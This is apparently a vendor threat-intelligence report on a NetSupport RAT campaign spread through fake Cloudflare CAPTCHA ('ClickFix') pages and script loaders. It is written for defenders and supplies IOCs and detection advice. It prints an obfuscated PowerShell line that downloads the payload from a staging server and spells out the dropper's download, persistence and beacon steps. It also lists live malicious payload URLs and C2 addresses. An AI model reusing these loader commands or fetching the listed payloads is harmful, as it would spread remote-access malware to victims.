Signed, Sealed, Delivered: How a Legitimately-Signed NetSupport Binary Became a Weapon Across 333+ ClickFix Infections
TL;DR: A legitimately signed NetSupport Manager v14.12 binary -- bearing a valid GlobalSign EV code-signing certificate issued to NETSUPPORT LTD -- is being weaponized as a Remote Access Trojan across two active delivery chains. The first chain uses fake Cloudflare Turnstile CAPTCHA pages to trick victims into pasting PowerShell commands, pulling the RAT payload from a GitHub account with 333+ confirmed downloads. The second chain uses VBScript and JavaScript loaders to deploy the same binary via Cloudflare Tunnels, connecting to a C2 gateway at mulenial.info on Russian-operated infrastructure. Both chains share operational fingerprints -- a consistent 7z password (-pppp), common file naming conventions, and Russian registrar clustering -- pointing to a single MaaS operation with multiple delivery affiliates.
The Trust Problem: When the Signature Is Real
This investigation began with a file that most security tools would pass without a second look. Service.exe (SHA256: 56ebaf89...) is a genuine NetSupport Manager v14.12 client binary, compiled on 2025-07-03 and signed nine days later with a valid GlobalSign Extended Validation certificate issued to NETSUPPORT LTD. The certificate chain is clean. The signature is timestamped. The PDB path (E:\nsmsrc\nsm\1412\1412\client32\release_unicode\client32.pdb) is consistent with NetSupport's internal build process. Nothing about the binary itself is malicious.
That is the entire point.
The .text section of Service.exe is 194 bytes -- a stub whose sole purpose is to load PCICL32.dll and invoke _NSMClient32@8. All remote access capability lives in companion DLLs deployed alongside the binary. The C2 destination is stored in a separate client32.ini file. This means the attacker ships a perfectly legitimate, validly signed executable that most enterprise AV/EDR solutions will deprioritize or skip entirely, and controls its behavior through external configuration files that have no signature at all.
As of 2026-03-15, the binary sits at 15/76 detections on VirusTotal. More than 80% of security engines see a signed NetSupport binary and move on.
Delivery Chain A: Fake Cloudflare Turnstile and a GitHub Release Page
The first delivery chain exploits the ClickFix social engineering technique -- a pattern that has gained significant traction since late 2024. Victims land on pages that impersonate Cloudflare Turnstile or reCAPTCHA verification prompts. The pages instruct the user to "verify" by opening the Windows Run dialog (Win+R), pasting a PowerShell command from the clipboard, and executing it. The lure pages are hosted across a cluster of recently registered domains:
| Domain | IP | Registered | Purpose |
|---|---|---|---|
lubazra.com | 185.82.217.17 | 2026-02-26 | ClickFix landing page |
cloflart.com | 87.120.93.69 | 2026-02-25 | RAT package staging |
sasndfsdfghjasd.run | 172.67.140.168 | 2026-02-24 | Redirect chain |
winecdn.sbs | 178.16.52.101 | 2026-03-13 | JavaScript injector |
All four domains were registered via NICENIC International Group within a 17-day window. Two of them use ERANS.RU nameservers. This registrar clustering is the campaign's most significant OPSEC failure, and we will return to it.
The PowerShell Dropper
When the victim pastes and executes the clipboard payload, a PowerShell dropper (gosidefastandpure_netsupport_dropper.ps1) executes the following sequence:
- Pre-install beacon:
GET https://gosidefastandpure.com/{id}/started/{token}-- notifies the operator that the dropper is executing on a live victim. - Payload download: Fetches
mw--58389c35-c76b-46ac-b33e-7efe83b65fda.zipfrom a GitHub Releases page under the account4realgg, repositoryHelper-Update1.0. - Extraction and execution: Unpacks the ZIP to
%LOCALAPPDATA%\{GUID}\and launchesclient32.exe. - Persistence: Creates
WinAuthenticate.lnkin the Startup folder. - Post-install beacon:
GET https://gosidefastandpure.com/{id}/completed/{token}-- confirms successful RAT deployment.
The GitHub release page is still live. As of 2026-03-15, the download counter reads 333. That number represents a minimum bound on successful infections from this single delivery vector alone. The real count is likely higher -- some victims may download the ZIP but fail to execute it, and the counter does not account for payloads served from other staging infrastructure such as cloflart.com/at.7z.
The Tracker: gosidefastandpure.com
The victim tracking server at 194.180.191.239 (MivoCloud SRL, Moldova) runs nginx/1.22.1 fronting a Python Waitress backend. It serves two purposes: confirming that the PowerShell dropper has started executing, and confirming that the RAT has been successfully installed. The two-beacon pattern gives the operator real-time visibility into the conversion rate between "dropper executed" and "RAT deployed" -- operational metrics for a malware delivery business.
The domain was registered on 2026-02-10 via NICENIC, the same registrar used for the ClickFix landing pages. The server also hosts gosidefastandpure.com on ports 80, 443, and 8080.
Delivery Chain B: VBScript Loaders and Cloudflare Tunnels
The second delivery chain is less flashy but equally effective. It uses VBScript (loader.vbs), JavaScript (MARCELO-PDF.js), and PowerShell (scam.ps1) loaders distributed through phishing lures themed around PDFs, Zillow real estate listings, and XRP cryptocurrency.
The kill chain follows a familiar pattern:
DELIVERY
Victim receives phishing lure → executes loader.vbs or loader.js
↓
DOWNLOAD
curl downloads Build.zip from:
- Cloudflare Tunnel: challenges-natural-infinite-camera.trycloudflare.com/Build.zip
- Direct staging: http://89.185.80.76/Build.zip
↓
DEPLOY
tar -xf Build.zip → drops to %APPDATA%\Roaming\Build\
Deletes the ZIP archive
↓
PERSIST
Registry: HKCU\...\Run\Update → path to Service.exe
OR: LNK in Startup folder
↓
C2
Service.exe → loads PCICL32.DLL → reads client32.ini
→ TCP 443 to mulenial.info (178.130.47.196)
→ beacon: GET /fakeurl.htm
One variant uses char-array obfuscation in PowerShell to hide the staging URL:
$url = -join (104,116,116,112,58,47,47,56,57,46,49,56,53,46,56,48,46,55,54,47,66,
117,105,108,100,46,122,105,112 | % {[char]$_})
# Decodes to: http://89.185.80.76/Build.zip
This is trivially reversible. The obfuscation exists solely to defeat static signature matching on the plaintext URL.
The Build.zip Package
The ZIP contains the full NetSupport Manager runtime -- 14 files including the signed Service.exe, the core engine DLL (PCICL32.DLL), audio capture capabilities (AudioCapture.dll), a remote command shell stub (remcmdstub.exe), a keyboard filter driver INF (nskbfltr.inf), and the critical client32.ini configuration file that points to the attacker's C2 gateway. Everything the operator needs for full remote desktop control, file transfer, shell access, audio surveillance, and clipboard monitoring -- all running under the cover of a legitimately signed binary.
Infrastructure: Same ASN, Same Actor
The most damning piece of infrastructure analysis in this investigation is the relationship between the C2 and staging servers in Chain B.
C2 Gateway: 178.130.47.196
| Field | Value |
|---|---|
| IP | 178.130.47.196 |
| ASN | AS215540 -- Global Connectivity Solutions LLP |
| Location | Frankfurt am Main, Germany |
| OS | Windows Server 2022 (Build 10.0.20348) |
| Machine Name | VM-d02119f6-3aa6-49ae-9f8f-1d094d6590a4 |
| Open Ports | 2222/tcp (SSH), 3389/tcp (RDP), 3478/udp (STUN) |
| VT Reputation | 0 (not yet flagged) |
| DNS | mulenial.info (ns1/ns2.erans.ru) |
| Domain Registered | 2026-03-03 |
Staging Server: 89.185.80.76
| Field | Value |
|---|---|
| IP | 89.185.80.76 |
| ASN | AS215540 -- Global Connectivity Solutions LLP |
| Location | Phoenix, US |
| OS | Windows 11 (21H2 / 10.0.22000) |
| Machine Name | DESKTOP-2NFCDE2 |
| Open Ports | 135/tcp (RPC), 445/tcp (SMB), 3389/tcp (RDP) |
| VT Malicious | 2 |
Both servers sit on AS215540. The staging server's machine name -- DESKTOP-2NFCDE2 -- is a default Windows workstation hostname, not a server naming convention. This is either the operator's workstation doubling as a staging server, or a hastily provisioned VPS that was never renamed. Either way, a single actor controls the full delivery-to-C2 pipeline.
The C2 domain mulenial.info was registered twelve days before the first VBScript loader was submitted to VirusTotal. It uses ERANS.RU nameservers -- the same Russian nameserver infrastructure used by cloflart.com in Chain A. This is the thread that ties both delivery chains to the same operator.
OPSEC Failures
The operator made several mistakes that allow clustering and tracking of this campaign:
-
GitHub delivery exposed: The
4realggaccount andHelper-Update1.0repository remain live. The download counter provides a public tally of successful deliveries. -
NICENIC registrar clustering:
gosidefastandpure.com,cloflart.com, andlubazra.comwere all registered via NICENIC International Group within 16 days (Feb 10--26, 2026). This registrar is not commonly used for legitimate domains and creates a trivial pivoting surface. -
ERANS.RU nameserver reuse: Both
cloflart.com(Chain A) andmulenial.info(Chain B) use ns1/ns2.erans.ru nameservers, linking the two chains to the same operator or MaaS infrastructure provider. -
Shared ASN: C2 and staging on the same AS215540 allocation. No effort to separate delivery from command and control.
-
Server hostname leak: The IP behind
cloflart.com(87.120.93.69) reveals hostnames241764.love-is.nexusvia Shodan reverse DNS. -
Co-hosted domain:
lubazra.com(185.82.217.17) also hostsprimeautocenter.com-- a potential operator personal or business domain worth investigating. -
Unpatched VPS: 45.142.193.27, part of the ClickFix infrastructure, is vulnerable to CVE-2020-0796 (SMBGhost) with WinRM, SMB, and RPC exposed. An operator who does not patch their own infrastructure is an operator who will be found.
-
Workstation hostname on staging server:
DESKTOP-2NFCDE2is not a server name. It is a default Windows desktop hostname that the operator forgot to change.
The C2 Protocol
NetSupport Manager uses a proprietary protocol over TCP. The fakeurl.htm URI is a well-documented beacon path specific to weaponized NetSupport deployments. The client resolves mulenial.info to 178.130.47.196, connects to port 443 over raw TCP -- notably, this is not HTTPS despite using the standard HTTPS port -- and sends GET /fakeurl.htm as a keep-alive beacon. The use of port 443 is a deliberate attempt to blend with legitimate HTTPS traffic at the network flow level, but any deep packet inspection or TLS handshake analysis will immediately reveal the traffic as non-TLS.
All NetSupport clients, including malicious deployments, also call http://geo.netsupportsoftware.com/location/loca.asp for geolocation. This is a built-in feature of the legitimate software and will appear in network logs from both malicious and legitimate installations. Its presence alone is not an indicator of compromise; its presence in combination with client32.ini pointing to non-NetSupport infrastructure is.
The Broader MaaS Cluster
This campaign is not isolated. The delivery infrastructure connects to a wider NetSupport RAT Malware-as-a-Service operation with consistent tradecraft across dozens of campaigns:
| Indicator | Pattern |
|---|---|
| 7z password | -pppp (all archived variants) |
| Delivery filenames | ax.7z, at.7z, lnk.7z |
| Binary naming | Service.exe, neservice.exe, sysinfo.exe, byby.exe |
| Installation folders | Build, Nfservice, RiverNature Horizon |
| Persistence key | HKCU\...\Run\Update |
| Beacon URI | /fakeurl.htm |
Related MaaS nodes include infrastructure tied to Zillow real estate phishing (gologpoint.com, josehpjon.com), XRP cryptocurrency lures (xrpnode.app, validatorxrp.dev), and domains hosted on AS198953 Proton66 OOO, a Russian hosting provider (jakkakaskakasj.com, jasjdpoekkqwda.com). The MARCELO-PDF.js loader filename also suggests targeting of Brazilian-Portuguese speaking victims -- consistent with documented NetSupport RAT campaigns in that region.
MITRE ATT&CK Mapping
| Technique | ID | Campaign Usage |
|---|---|---|
| Phishing: Spearphishing Link | T1566.002 | ClickFix lure pages, PDF/Zillow/XRP phishing links |
| User Execution: Malicious Link | T1204.001 | Victim clicks ClickFix lure URL |
| User Execution: Malicious File | T1204.002 | Victim executes loader.vbs, MARCELO-PDF.js, scam.ps1 |
| Command and Scripting Interpreter: PowerShell | T1059.001 | ClickFix PowerShell dropper, char-array obfuscated loaders |
| Command and Scripting Interpreter: VBScript | T1059.005 | loader.vbs delivery via wscript.exe |
| Ingress Tool Transfer | T1105 | curl/IWR downloads Build.zip from staging |
| Signed Binary Proxy Execution | T1218 | Legitimate NETSUPPORT LTD EV-signed binary |
| Masquerading: Match Legitimate Name | T1036.005 | Binary renamed to Service.exe, sysinfo.exe |
| Deobfuscate/Decode Files or Information | T1140 | Char-array URL obfuscation, ZIP/7z extraction |
| Boot/Logon Autostart: Registry Run Keys | T1547.001 | HKCU...\Run\Update persistence |
| Boot/Logon Autostart: Startup Folder | T1547.001 | LNK in Startup folder |
| Remote Access Software | T1219 | NetSupport Manager used as RAT |
| Application Layer Protocol: Web Protocols | T1071.001 | GET /fakeurl.htm beacon on port 443 |
| Non-Standard Port | T1571 | NetSupport protocol on 443 (non-TLS) and 2081 |
| Screen Capture | T1113 | NetSupport built-in capability |
| Audio Capture | T1123 | AudioCapture.dll |
| Proxy: Domain Fronting | T1090.004 | Cloudflare Tunnels for delivery |
| Exfiltration Over C2 Channel | T1041 | Files and screen data via NetSupport protocol |
Indicators of Compromise
IOCs are provided for defensive use. Handle responsibly.
File Hashes
| SHA-256 | File | Chain |
|---|---|---|
56ebaf8922749b9a9a7fa2575f691c53a6170662a8f747faeed11291d475c422 | Service.exe / client32.exe (v14.12) | Both |
b6d4ad0231941e0637485ac5833e0fdc75db35289b54e70f3858b70d36d04c80 | PCICL32.DLL (core engine) | Both |
2f3f5721674bca6bf2b73760e7f925fd10baaf3009a46ba8ccf79ba23bf8a6cc | gosidefastandpure_netsupport_dropper.ps1 | A |
517fee961cdd99d528a07bc1c47e07e45bb5b23a3f87d5d4ea10d5dd6e78bd5c | at.7z (RAT package) | A |
7c9d85c89949b43ef2fa71da2f2f2c62c25bad72f0ba89f5bf30b6f6ded2c8e8 | lnk.7z (launcher archive) | A |
7b751faeacf9fe510b700f33fb7410facff2d487d33a4711e4dbc8c082ba32cf | Build.zip (NetSupport package) | B |
ff7f999f70b59ded1da165d5bd3889ef3b93a3b03cb16a5cfb70348d82a46adc | client32.ini (C2 config) | B |
0f99b1da524e28f9b3e09f877db4b182f9ecf60ce3c0cfb8b18ad6ff4cf996af | loader.vbs | B |
fb7a84c24d10e1471bc83fcdc887ab7926da55571f7c3c8467b260611bb878d5 | MARCELO-PDF.js | B |
15015b739b901b6eb4849a504341068993de5ce324f619dc3f9d1230d3fa5759 | scam.ps1 | B |
e09980d1b1c508eb29d2931ac92f8d0a7e49ca5fe6ab6277fabf097a0b033b63 | NSM.LIC | B |
Network Indicators -- Chain A (ClickFix/GitHub)
| Type | Indicator | Description |
|---|---|---|
| Domain | gosidefastandpure.com | Victim tracker / C2 beacon |
| IPv4 | 194.180.191.239 | gosidefastandpure.com (MivoCloud, Moldova) |
| Domain | lubazra.com | ClickFix landing page |
| IPv4 | 185.82.217.17 | lubazra.com (Green Floid, Bulgaria) |
| Domain | cloflart.com | RAT staging |
| IPv4 | 87.120.93.69 | cloflart.com (SKYNET, Lithuania) |
| Domain | winecdn.sbs | ClickFix JS injector |
| IPv4 | 178.16.52.101 | winecdn.sbs (dus.net, Germany) |
| Domain | sasndfsdfghjasd.run | Redirect chain |
| Domain | mrllvd.beer | Campaign domain |
| IPv4 | 94.154.35.162 | mrllvd.beer (Railnet, Russia) |
| URL | https://github.com/4realgg/Helper-Update1.0/releases/download/update1/mw--58389c35-c76b-46ac-b33e-7efe83b65fda.zip | Payload ZIP (333+ downloads) |
| URL | https://gosidefastandpure.com/{id}/started/{token} | Pre-install beacon |
| URL | https://gosidefastandpure.com/{id}/completed/{token} | Post-install beacon |
| URL | http://cloflart.com/at.7z | RAT archive |
| URL | https://winecdn.sbs/api/css.js | ClickFix injector JS |
Network Indicators -- Chain B (mulenial.info)
| Type | Indicator | Description |
|---|---|---|
| IPv4 | 178.130.47.196 | C2 gateway (AS215540, Frankfurt) |
| IPv4 | 89.185.80.76 | Staging server (AS215540, Phoenix) |
| Domain | mulenial.info | C2 domain (ns: erans.ru, registered 2026-03-03) |
| URL | http://178.130.47.196:443/fakeurl.htm | C2 beacon |
| URL | https://challenges-natural-infinite-camera.trycloudflare.com/Build.zip | Delivery via CF Tunnel |
| URL | https://choosing-arbitrary-angela-decades.trycloudflare.com/Build.zip | Delivery via CF Tunnel (alt) |
| URL | http://89.185.80.76/Build.zip | Direct staging delivery |
Host Indicators
| Type | Indicator | Description |
|---|---|---|
| Registry | HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update | Persistence key pointing to Service.exe |
| File Path | %APPDATA%\Roaming\Build\Service.exe | Primary deployment path |
| File Path | %APPDATA%\Roaming\Build\client32.ini | C2 configuration file |
| File Path | %APPDATA%\Local\Nfservice\neservice.exe | Alternate deployment path |
| File Path | %PUBLIC%\extraido\Service.exe | PS1 variant deployment path |
| LNK | %APPDATA%\...\Startup\*.lnk | Startup folder persistence |
Related MaaS Infrastructure
| Domain | IP | Role | VT Malicious |
|---|---|---|---|
jakkakaskakasj.com | 193.143.1.21 | C2 Gateway (Proton66 OOO, RU) | 16 |
jasjdpoekkqwda.com | 193.143.1.21 | C2 Gateway (Proton66 OOO, RU) | 17 |
nobovcs.com | 87.120.93.69 | Delivery (same IP as cloflart.com) | 18 |
srvc-mcrst.com | 152.89.244.70 | C2 Gateway (Frankfurt) | 16 |
gologpoint.com | 62.164.177.248 | C2 Gateway (Zillow campaign) | 18 |
xrpnode.app | 212.86.101.32 | Delivery (XRP lure) | 4 |
validatorxrp.dev | 193.143.1.233 | Delivery (XRP lure) | 9 |
anodes.pro | (Cloudflare) | Stealc V2 C2 | -- |
shift-art.com | 37.140.192.197 | Rugmi MSI delivery (REG.RU) | -- |
Detection Recommendations
Endpoint:
- Alert on
Service.exe,neservice.exe, orclient32.exeexecuting from%APPDATA%,%LOCALAPPDATA%, or%PUBLIC%paths. Legitimate NetSupport Manager installations reside in%ProgramFiles%. - Monitor for
PCICL32.DLLloaded by any process outside of standard NetSupport installation directories. - Flag registry key creation at
HKCU\...\Run\Updatepointing to any executable in user-writable directories. - Detect PowerShell processes spawned by clipboard paste patterns (Win+R execution) with network callouts to recently registered domains.
Network:
- Inspect outbound TCP connections to port 443 that do not complete a TLS handshake. NetSupport RAT uses its own protocol on port 443 -- the traffic is plaintext HTTP, not HTTPS. This is highly anomalous and straightforward to detect with any protocol-aware firewall or IDS.
- Alert on HTTP requests to
/fakeurl.htmon any port. This URI is specific to weaponized NetSupport deployments and has no legitimate use. - Block or alert on connections to
geo.netsupportsoftware.com/location/loca.aspfrom hosts that do not have a licensed NetSupport installation. - Monitor for GitHub Release downloads from unknown or recently created accounts, particularly ZIP files in the 2-5 MB range.
Infrastructure:
- Block the IOC IP addresses listed above at the perimeter. Both C2 and staging IPs on AS215540 serve no legitimate purpose.
- Monitor DNS for resolutions to domains using ERANS.RU nameservers -- this nameserver infrastructure is heavily associated with malicious registrations in this campaign.
- Consider blocking Cloudflare Tunnel subdomains (
*.trycloudflare.com) at the proxy level, or at minimum logging and alerting on downloads of ZIP/7z archives through them.
Conclusion
This campaign illustrates a persistent tension in enterprise security: the trust model for code-signed binaries is built on the assumption that a valid signature implies benign intent. NetSupport Manager v14.12 is a legitimate remote administration tool with a legitimate certificate chain. Nothing about the binary has been modified, cracked, or tampered with. The attacker simply deploys it in an unauthorized context with a malicious configuration file, and the signature provides cover against 80% of security engines.
The ClickFix delivery mechanism compounds the problem. By having the victim manually paste and execute a PowerShell command, the attacker bypasses email attachment scanning, browser download warnings, and macro-based execution controls. The initial execution is a user-initiated action from the Run dialog -- a pattern that most endpoint security products will not flag as suspicious until the PowerShell content is analyzed.
The operational fingerprints -- NICENIC registrar clustering, ERANS.RU nameservers, REG.RU domain registration, Proton66 OOO hosting -- place this firmly in the Russian-speaking MaaS ecosystem. The consistent 7z password, file naming conventions, and persistence mechanisms across multiple delivery campaigns suggest a service model where a central operator manages the RAT infrastructure while affiliates handle delivery. With 333 confirmed downloads from a single GitHub release page, multiple active delivery chains, and C2 infrastructure that remains unflagged at a VT reputation of zero, this operation is running and growing.
The infrastructure was entirely live as of 2026-03-15. All IOCs in this report are actionable.
Published 2026-03-15 | BGI Autonomous Threat Hunting | Breakglass Intelligence